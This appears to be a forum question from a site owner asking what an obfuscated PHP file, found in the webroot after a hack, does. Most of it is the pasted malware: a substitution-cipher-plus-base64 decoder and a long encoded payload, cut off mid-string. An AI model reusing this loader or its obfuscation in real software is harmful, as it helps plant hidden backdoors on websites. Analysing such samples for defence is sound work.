What does this malicious PHP script do? [closed]

7

Someone hacked my site and uploaded this script (template46.php) to my webroot; its contents are:

<?php
$vIIJ30Y = Array('1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');
function v78ZFAX($vJOJJ7T, $vRJ8WGX){$vM74216 = ''; for($i=0; $i < strlen($vJOJJ7T); $i++){$vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];}
return base64_decode($vM74216);}
$vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.
'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.
'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'.
'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'.
'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'.
'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'.
'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'.
'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'.
'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'.
'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'.
'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'.
'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'.
'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'.
'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'.
'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'.
'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'.
'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'.
'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'.
'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'.
'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'.
'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'.
't8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'.
'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'.
'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'.
'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'.
'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'.
'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'.
'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'.
'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'.
'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'.
'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.
'KgR4SgR4Sgj2X9At28Rk4oxjO97rtH7NMSxOSgR3Sgl22oB24SgOTgj2cgjPK9zcW9710HgGPKBwVe723'.
'bWktbWGO9dm2H7JjipZjKBwVe723SlPKoJPKgxm4HBwV9xGcYgm4HBwV9RQ8eRKWeR2ubz1v9gjOUBt28'.
'7wMSw4TgjOKKfmP97r2Yy4je7N49RKu8710bzcMSgm4HBwV9w3AUBt287aARxOTgjOKKfmP97r2Yy4j8dwVRsrteEKnbWj'.
'OUBt287aXCJPKgxm4HBwV9xGcYfm2ofmu8710bzcMSgm4HBwV9xOTgjOKKfmP97r2Yy4joBLr8wcVe'.
'7QW8E5PKfmP97r2Sp3SgjOKKBr2bEQt9sajixGO87wMbs1d9RQ8eRKWeR2ubz1v9gjO87wMbs1d9R5XRp3SglOO8'.
'7wMbs1d9xGcYB13UBwWRsrteEKnbWjO87wMbs1d9w3A87wMbs1d9xKUSp3SglOO87wMbs'.
'1d9xGcYBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4jUBwZU1cVe'.
'7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4joBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxFnKBr2bEQt9saj'.
'ixkJeRQMRsrteEKnbWjO87wMbs1d9xJjKfktbEQ2bWOTgjOKKBr2bEQt9sajixkzUBwX81cVe7QW8E5PKBr2bE'.
'Qt9sa3YgmzUBwX8gOTgjPKgxmzbzcVYy4jKB9W8srM7s1Wbz1LREKt8zlPKB9W8srMSw4TgjOKKB9W8s4jixkt8fm2b'.
'2cVe7QW8E5PKB9W8sr8Yz9W8s4ARxOTgjOKKB9W8s4jixkvU7ru8710bzcMSg'.
'mzbzcVSp3SglOO9dKn8xGcYfm2ofmu8710bzcMSgmzbzcVSp3SglOO9dKn8xGcYftvU7ru87'.
'10bzcMSgmzbzcVSp3SglOSgl2X9AGPbEmWbEmWSgmzbzcV6gGA74Q'.
'warmipw4ASxGcixkBlaNpmxOSgl2TgjOKgxmzbzcVYy4j9dKn8wcP8EQ4S'.
'gmzbzcVSp3Sgl2cgjOK97NM9lPKgR3SglOKKB9W8s4jixkMUfKubzwJ8B109xjA74Qwarmipw4A6g'.
'GAYAJjKB9W8s4XCJPKgR4SgjOKKBrtH7N2bAGcYgmVe7239RKM7s1Wbz1LREKt8zlPKBr'.
'tH7N2bd5XRp3SgjOKbswv91cVe723SgmzbzcV6gGO97rtH7J3Ygm4HBwV9xJjK'.
'Br2bEQt9sa3YgmVe7239RYXCJPKulXcgjXzU7L0UB2n8AkM97LORsrtH7JPKB'.
'9W8s43Ygm48WJjKfQrezP3Ygm49Rt46gGO871X8BwWSlXTgAGjYgGOHBwt9gGcYgYACJPSYgGjYgmr8AGcY'.
'fQ4bdmnURkJ9RYPU7LXb72OSfmX87aPSxOXCJPSYgGjYgmP971OYgZcYgKBb'.
'zcVCAGO9dKn8wNvY03SYgGjYgmP971OYgZcYgKe6artH7N2b0PjKBrtH7N2b2NvY03SYgGjYgmP971OYgZcYgKx9Rk3oxra8MPj'.
'KB9W8srb8AYTgjPjYgGjKBt2e7lj604jYOrX87aVwzwWbs2n80Pj5xZJRBZACJPjYgGjKBt2e7lj604jYOQn8dm28dlVwf2J9'.
'pPj8Rw3UB2JeRK46s13UBwW8z14HR92CWYTgAGjYgGOHBwt9gGvixGAezcr8zmtbdOcRgYV6x4V6x4V6x4VYAZO'.
'U7ZvY2JARBLb8AYTgAGjYgGSYgGjYgmJ8B1X8AGcYfQ4bz2JREmt9E5PKfm2oflXCJPjYgGjKfXt9WGcYgYV6x4V6x'.
'4V6x4V6x4A6Amr8AZARBLy8sL497L46wmLbBaDYfm2oflnbBNtH7ZTYBQ'.
'PeRKM9RlcRgKKa4FVCyjrCx4NRgYTYB9nbzrtUyrz8BcE97mb8AYTgAGjYgGOoz1dYgZcYgKy8sL'.
'497L46wmWe7LM9zwW6awvescOH7LdCAGEez24RBLb8AYvKfk3e72v6AKb82NvY03SYgGjYGPjYgGjKf'.
'Xt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvY2NvlscvUBwvUgraoRk2CAk49Rt46'.
'st487JTYBQPeRKM9RlcRgKKa4FVCyjrCx4NRgYTRBZACJPjYgGjKfXt9WGvixGAlscvUBwvUgrabz1vbs'.
'92bAr18zQn9B2v9MPjQsKXU1NvRBZOUBwZU1NvRBZACJPjYgGjKfXt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvYA4VY'.
'03SYgGjYGPjYgGjH7ePescr8dlPK1cBxaN1aWOjiAGJSlPjYgGjoJPjYgGjYgGjYB9nbzwtesjPK1cBxa'.
'N1aWktbWGO9z239xOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYB2zSB9X8'.
'Bwu9RtXbEmMSgmzH7N27WK48Rku8z1V9xKUSxOSYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgG'.
'jKBejixkz8Ek28AjO9z239w3AUBrJRsLt87aARxJjYdKAYAOTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgY'.
'V6x4V6x4V6x4V6x4A6Amr8AZARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgraoRk2CAktbfk'.
'3H7QtUB2n8AcneEm2UgrMUfK2e74TY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj60'.
'4jYzLt87acRgYA6AmzH7N27WKve7r2Y24vY2JARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgr'.
'abz1vbs92bAr18zQn9B2v9MXAeRQ2Q0mb8AYTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgKy8sL497L46amXbE'.
'knbs24H7cvCz14UB10HBr28dlTY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj604jYz9X8Bwve7r2iwJAYAZO9z239w3A8z1V9'.
'xKU6AKbY2NvRBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixk0HfwvHr'.
'cMbBNXUgtAeRQ2Q0mu97L08sm2SB9W971OSgmz6gkzH7N2bs2D9xjO9z239w3AUBrJRsLt87aARxOXSxO'.
'vY2NvY03SYgGjYgGjYgGjYgGjYgGjYB908BcM9xjO9AOTgAGjY'.
'gGjYgGjYgGjYf4SYgGjYgGjYgkcgAGjYgkcgjPjYgGjH7ePlBrtH7JPKfmn6gGObEwAHAJjKfXt'.
'9WJjKBt2e7lXSlPjYgGjoJPjYgGjYgGjYB2zSg128Rk4oxjORrkiarm8KE92bzKnbsadRxOXgAGjYgGjYgGjYgG'.
'jYBw0HBFjY2Q1pOm1mgYTgAGjYgkcgAGjYgk28fQ2gAGjYgkTgAGjYgGjYgGjH7ePY7wVbfmLSgmuahcpw13dUzwWezcM9xUU'.
'SxOSYgGjYgGjYgGjYgGj97QP8WGAmO1KpgYTgAGjYgkcgd4Sgz9r8zQ4H7cvYB13UBwWRsrteEKn'.
'bWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQTSgZISR40w7Od6gGOescvUBwvUgJjKBrtUBQP9R5XCJPSYgGjY'.
'B9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ85w4XCWGOHx3qSlPjYgGjoJPSYgGjYgGjYgG'.
'O8d5jixk2ofk38sm2SgKFYAJjKBrtUBQP9RQ85wr8KB2USp3SYgGjYgGjYgGOeMYjixk08EwvUgjO8d5XCJPjYgGjYgG'.
'jYgmWe7LOYy4jbz1v9gjJ6gGPKB5WYg4j5xOXCJPjYgGjYgGjYgm08sL497L4Yy4jbEmWREK2bBNtesaPYd3A6Am'.
'VeRm0HBwM7M1U7WmXRxZAuxY3Ygmvbr3Obz1v9143Ygm08sL497L4S'.
'p3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjUBw'.
'ZU1cVe7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sgb0R1VamwtaRg4P7r3D9B2dHRlDRw4qSwJVS'.
'1V8CzmX9s24C2rUSW2bRx5d6gGOescvUBwvUgJjKBrtUBQP9R5'.
'XCJPSYgGjYB9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ8514XCWGOHx3qSlPjYgGjoJPjYgGjYgGjYgmVH7ZjixG'.
'O8714est2br3NRw3OHw4TgAGjYgGjYgGjKBrtogGcYgmVeRm0HBwM7MKU7WmXRp3SYgGjYgGjYgGObz1v9gGcYfKt8zlPKBr'.
'X8AJjKBrtogOTgAGjYgGjYgGjKfUnbzljixkd97L2bz149wcE8EKOSgmWe7LOSp3SgAGjYgGjYgGjKB'.
'Qn8dm28dljixkJbzwdREK2bBNtesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB'.
'2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAGjYgkcgjPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rm171mb6xt87MXOH'.
'7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EYPKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7'.
'MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGOescr8dljixGO8714est2br3NRw3OHw4TgjP'.
'jYgGjYgGjYgmE8EKOYgGcYBU28zwWeRm2REUnbzlPKBQnU7L4Sp3SgAGjYgGjYgGjKBQn8dm28dljixkJbzwdREK2bBN'.
'tesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAG'.
'jYgkcgjPSYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjoBLr8wc'.
'Ve7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sg'.
'b0R1VCwarb6xt87MXOH7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EY'.
'PKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGO8dwVY'.
'y4jKBrtUBQP9RQ85wr8KB2UCJPjYgGjYgGjYgmVH7ZjixkJ8EbP5pG3YgmvU74j6xGNSp3SYg'.
'GjYgGjYgGO871ZYy4jbBcESyhJ6gGO8dwVSxGVYyhTgjPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6g'.
'GO871ZSp3SYgGjYgGjYgGOescvUBwvUgGcYfQ4b2cW9Rk3e7Q2SgmVeR'.
'm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp3SYgGjYf4SYgGjYfK2UfwW8AGOescvUB'.
'wvUy3SulPS9dwveEmX8sZj8dwVRsrteEKnbWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rKkpOmb6xt87M'.
'XOH7UXUyXURx3XRg4P7r3D9B2dHRlDRw4qSwNUYWb3Ygm08sL497L46gGO8714est2bWOTgjP'.
'jYgGj9zcWSgmXYy4j5y3jKBOjigk08EwvUgjO8714est2br3JRxOTYgmXSW3XgAGjYgkTgAGjYgGjYgGjKBrX8AGcYgmV'.
'eRm0HBwM7M1U7WmXRp3SYgGjYgGjYgGO871ZYy4jKBrtUBQP9RQ'.
'852r8KB2UCJPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6gGO871ZSp3SYgGjYgGjYgGOescvUBw'.
'vUgGcYfQ4b2cW9Rk3e7Q2SgmVeRm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp'.
'3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZj9swv9RKtUBwuUscW9gjO8Bwv9EmPSlXTgAGjYgGOesttb'.
'd5jixGde7K09Bwz9stXHzV387Lnbf1WbEmrUd2ZoAbTgAGjYgGO8dwVlsttbd5jixkMUfK397ZPKBQPeRKMSp3SYgGjYgm'.
'MUfKX8zbjixGdKM3SYgGjYB9nbAjOHxGcYyGTYgmXYyJjKBN28zU4Hy3jKBOqSWOSYgGjYf3SYgGjYgGjYgGObEmWH7Ld'.
'YgZcYfQredQ4bAjOesttbd53YfKt8zlP5xJjKBLr8aQPeRKMSxGVYyh3YyhXCJPjYgGjulPjY'.
'gGjbzw4URKvYgmMUfKX8zbTgd4Sgz9r8zQ4H7cvYfktbEQu8710b'.
'zcMSgm08sL497L46gGObB1MbswMSlXTgAGjYgGObB1MbWGcYB1Wbz1LREknbgjObB1MbswMSp3SYgGjYGPj'.
'YgGjbzw4URKvYfQ4b2cW9Rk3e7Q2SgK8ah1par4A6gGObB1MbWJjKBQn8d'.
'm28dlXCJXcgjXzU7L0UB2n8AkzUBwX81cVe7QW8E5PKBQn8dm28dl3YgmzUBwX8gOSoW'.
'GjYgGSYgGjYfK2UfwW8AkMUfKubzwJ8B109xjA749ama25RxY3YgmzUBwX8gJjKBQn8dm28dlXCJ'.
'XcgjXzU7L0UB2n8AkXbrcXbgjObEmWSxkTgAGjbzw4URKvYfkW97Uu8714esjPYAcoS13N6p2Uu13N6'.
'p2U7MGVCwrF5w3J6p2U7MGVCwrF523J6pmU7MGVCwrF50w85g4rRxOPRgZP7MGVCwrF7MhVCwr85g4LRRJ'.
'N7MGVCwr85g4LRRJW7MGVQ1r85g4LRRJWQw3J6pwUSx2T5E4O6W'.
'Y3KfQ4bAOTgd4Sgz9r8zQ4H7cvYB9W8sruHBcMUgjOescvUBwvUgOSoJPSYgGjYgmP8EQ4Yy4jbfK29'.
'rcW9Rk3e7Q2SgbnRAtEUEUF9dmJSwJv6sOd6gbd6hGORrQ1a291a23dx1maa1cYprQaKr4XCJPSYgGjY'.
'B2zYgtXbrcXbgjOHBcMUgOXgAGjYgkTgAGjYgGjYgGjbzw4URKvYgm08sL497L4C'.
'JPjYgGjulPjYgGjgAGjYgGOUBcq97LMYy4j9RtJ8BcO9xjAlgY3Ygm08sL497L'.
'4Sp3SgAGjYgGOescvUBwvUgGcYgm48sV28dQ8514j6AGAlgYj6AGOHBcMUgGvYg'.
'Y+Y03SgAGjYgkW9RmrbzZjKBQn8dm28dlTgd4Sgz9r8zQ4H7cvYBwWbzcWRMl'.
'JQgjXgd3Sg7t2e7m2bAjAx1maagFN60hjQyG4YhLnUgkB8Ewv9gYXCJPSgxmrbzOjixkJbzwdREK'.
'2bBNtesaPKWFPRyFX6APO6Wb3Ygbd6gGORrQ1a291a23daOwmwawpw1cwaOOdRxGXCJPS'.
'gxm08sL497L4Yy4jeEwMUBcVRst4UfkubzwNU7wMUyhPYzt4UfGD6'.
'WFA6Amua4wxwOwx7WUYw1mlR4tiarldRxZA641Ba7XypOtvHytx'.
'UfmBxpQ7pRKg9Bm9UM9W8zU6o0U6mahASp3Sgxm08sL497L4Yy4jb'.
'EmWREK2bBNtesaPYgYnla9mHOQCxBLPC1K4Uh9K5r9QbOKO912EQdKv94VDQ4V1lxY3Ygmrb'.
'zO3Ygm08sL497L4YgOTgjPK9RtXUgjjKBQn8dm28dljSp3SulPSgz9r8zQ4H7cvYBQrbEmn8wcPUfmJREK2bRw2bElNSgmJe'.
'RKt8R5Xgd3SYgGjYB2zSgGtYB2MRs1Wbz1LSgmJeRKt8R5XYgOSYg'.
'GjYf3SYgGjYgGjYgGObB1We7rMYy4jeRKWeROPgAGjYgGjYgGjYg'.
'GjYgUrbzJdYy4+YgmJeRKt8R53gAGjYgGjYgGjYgGjYgUV9RmP8sldYy4+YgUfmwldgAGjYgGjYgGj'.
'Sp3SYgGjYf4SYgGjYGPjYgGjH7ePYgmJeRKt8RQ8KEwW8gUUip4dKWG'.
'XYfK2UfwW8AkBlaNpmp3SYgGjYGPjYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3'.
'd87w4HBcOKr4XYgOjKfktbz1Vbr3d87w4HBcOKr4jixGPHRQM9RlPKf'.
'ktbz1Vbr3d9B14exUUSxezHRQueRKWeROPKfktbz1Vbr3d9B14exUUSxOjiWGdahcpwg'.
'bjCAGdm4waKM3SYgGjYgmJeRKt8RQ8Ksr2UBtn9gUUYy4jbEmWUBcrbfk2bAjOb'.
'B1We7rM7WUV9RmP8sldRxOTgAGjYgkX9AjjYxkX82ctbdKtoxjObB1We7rM7WUV9R'.
'mP8sldRxJjeRKWeROPK4U1wgb3YgUlprQaKWOXYgOjbzw4URKvYh9kp1Q1CWGSYgGjYGPjYgGj6WPj4K/mj'.
'QgZ466lnVg4460lngymjUBk4enlvcgD4e5j46Yj46/mjQgJ466lvQgT4eMlnUB646Oj466'.
'lvQg4YgPngAGjYgGOURK3Yy4jbB1WbswuURK3SgmJeRKt8RQ8KEwW8gUUSp3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KEQ0HBwV9xU'.
'USxGXYgmrbzN8KEQ0HBwV9xUUYy4jKst4UfGdCJPjYgGjH7ePYghjHRQM9RlPKfwW813dbB14HgUUSxGXYgmrbzN8K'.
'EktUBjdRxGcYgbnKM3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KstnbEldRxOjKAejHRQM9RlPKfwW813dbB14HgUU'.
'SxGXgAGjYgkTgAGjYgGjYgGjH7ePYfQ4bdknbWjOURK37WUJeRmPKr43YgbnKWOjSlPjYgGjYgGjYf'.
'3SYgGjYgGjYgGjYgGjKfwW813dHBcMUgUUYy4jbEwAbEmWSgmrbzN8KEktUBjdRxJ'.
'j5gJjbEmWbBcMSgmrbzN8KEktUBjdRxJjKWFdSxOTgAGjYgGjYgGjY'.
'gGjYgmrbzN8KEktUBjdRxGcYfQredQ4bAjOURK37WUJeRmPKr43YfQ4bdknbWjOURK37'.
'WUJeRmPKr43YgbnKWOXCJPjYgGjYgGjYf4SYgGjYgGjYgk28fQ2gAGjYgGjYgGjoJPjYgGjYgGjYgGjYgGOU'.
'RK37WUP8EQ4Kr4jixGOURK37WUJeRmPKr4TgAGjYgGjYgGjYgGjYgmrbzN8KEktUBjdRxGcYgbnKM3KgAGjYgGjYgGjulP'.
'jYgGjulPjYgGjKfwW813dbB14HgUUYy4jbfK29rcW9Rk3e7Q2SgYn7rNb6r4q6WY3YgYnYAJjKfwW813dbB14HgUUSp3S'.
'YgGjYB2zSgkXbEQ2UgjOURK37WUNU7wWoxUUSxGXYgmrbzN8KEktUBjdRxGv'.
'ixGAiE3OURK37WUNU7wWoxUUuxYTgAGjYgGSYgGjYgmJ8EK4Yy4jHR'.
'QM9RlPKfktbz1Vbr3dbBcWUgUUSxG/YgmJeRKt8RQ8KEknbdldRlPjYgGjYgGjYgGjYgGDYgjjHRQM9RlPKfwW813dbBc'.
'WUgUUSxG/YgmrbzN8KEknbdldRxGDYgjOURK37WUMest287adRp4cKst4UfkMKMF4Qy5DCyGXYgOTgAG'.
'jYgGSYgGjYgm4H7r28Ew4Yy4jHRQM9RlPKfktbz1Vbr3dUB2V97crUgUUSxG/YgmJeRKt8RQ8KEmX87wnURldRxGDYy5JCJP'.
'jYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3dbzw4URKvKr4XYgOjKfktbz1Vbr3dbzw4URKvKr4jixGdescvUBwvUgbTgAGjYgGS'.
'YgGjYgmMest287ajixGOURK37WUMest287adRp4cKst4UfkMKWG/YgUMbsJD6WFdCAbdCJPjYgGjKB9JYy4jlB'.
'9M8sQq8Ek28AjObsQP97r26AmrbzN8KstnbEldRxJjKfknbdl3Ygm2bdKv8WJjKBwWbdQ4bAJjKfmX87wnURlXCJPjYgG'.
'jH7ePYgmzbgGXgAGjYgkTgAGjYgGjYgGj6WPjp7cDH7N3exGI6JPjYgGjYgGjYB2zSgGtYB2Mbsw4SgmJe'.
'RKt8RQ8KrwM9RYVl7U28dldRxOjSxGObB1We7rM7WUwbswW6a1d97L4Kr4jixGAp7cDH7'.
'N3exFr60GjSB2lHBcv9p3jwp3jlrkwYB2lHBcv9xkiaWGMRMGj8B2q9xkQe75jpr5j7y3j97Z'.
'VUR5XYh1JbBN2wswAxs246MaWCgZNCgGPx4tapaJ3YBNXHsajmsw0HsFXY192bdQX8sZnQgZJYhrnez2'.
'39xFElp545xkpe79tbzOnQpYZ60hsY03SYgGjYgGjYgGSYgGjYgGjYgGObzwNU7'.
'wMUgGcYgKTKfktbz1Vbr3d87w4HBcOKrrcYf3OURK37WUJeRmPKrrcYhtaw1Gn5xZJRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jYOtnbElDYf3OURK37WUP8EQ4KrrcRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jY2wM9RYVl7U28dlDYf3ObB1We7rM7WUwbswW6a1d97L4KrrcYAZARfKb8AYT'.
'gAGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KEK29zwW9RYdRxOjSxGObzwNU7wMUg'.
'GvixGAazwz9RK2b0PjoWmJeRKt8RQ8KEK29zwW9RYdRRrbb2NvY03SYgGjYgGjYgkX9AjjHRQM9'.
'RlPKfktbz1Vbr3descnHs22Kr4XYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgm08scqH7ajixGAY03SYgG'.
'jYgGjYgGjYgGjH7ePYB2MRs1Wbz1LSgmJeRKt8RQ8KsQn8sVX9xUUSxGXYfVz8EK2e7QPSgGObB1We7r'.
'M7WU08scqH7adRxktbWGOHM4+KfejSxGOescnHs22YgZcYgYOHM4OU03jY03jKBQn8sVX'.
'9xGcYfQredQ4bAjOescnHs226yG36pYXCE4SYgGjYgGjYgGjYgGj97NM9xGOescnHs22Yy'.
'4jKfktbz1Vbr3descnHs22Kr4TgAGjYgGjYgGjYgGjYB2zSgGOescnHs22Yp4dKWGXYgmW9R1r9RQ4YgZcYgKy8scqH7aD'.
'Ygm08scqH7wbb2NvY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jYOQn8zL2eEmX8sZDYBQ38EQ2RfKb8AYT'.
'gAGjYgGjYgGjH7ePYgmJeRKt8RQ8Ksr2UBtn9gUUip4dahcpwgbjSlPjYgGjYgGjY'.
'f3SYgGjYgGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KsmtUBhdRxOjKAejHRQueRKWeROPKfk'.
'tbz1Vbr3d9B14exUUSxGXgAGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgGjYgGjYB9nbzwtesjPKfktbz'.
'1Vbr3d9B14exUUYh1pYgmqYy4+YgmsSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgmOeRmtYgZcYfwW8BwvescO9xjO'.
'HWOvKM4d6dwW8BwvescO9xjOUAOvKWedCJPjYgGjYgGjYgGjYgGjYgGjH7ePYfQredQ4bAjO9B14ex'.
'Jj6phXip4dKAbjSxGO9B14exGcYfQredQ4bAjO9B14exJJ6g4NSp3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGO9B14ex'.
'GvixGARfKb82NWRBZACJPjYgGjYgGjYgGjYgGSYgGjYgGjYgGjYgGjKfK2bRw2bElj604jYOQn8dm28dlVUf2'.
'J9pPjeRkJ8B20eRmX8sZnogrEUEbV9zcW8xrrbzN28zQn9BwORfKb8AYTgAGjYgGjYgGjYg'.
'GjYgmW9R1r9RQ4YgZcYgKy8sL497L467N28zU4HyPjYALMUfK397ZPKBmtUBhX6AKbb2N'.
'vY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jY2NWRBZACJPjYgGj'.
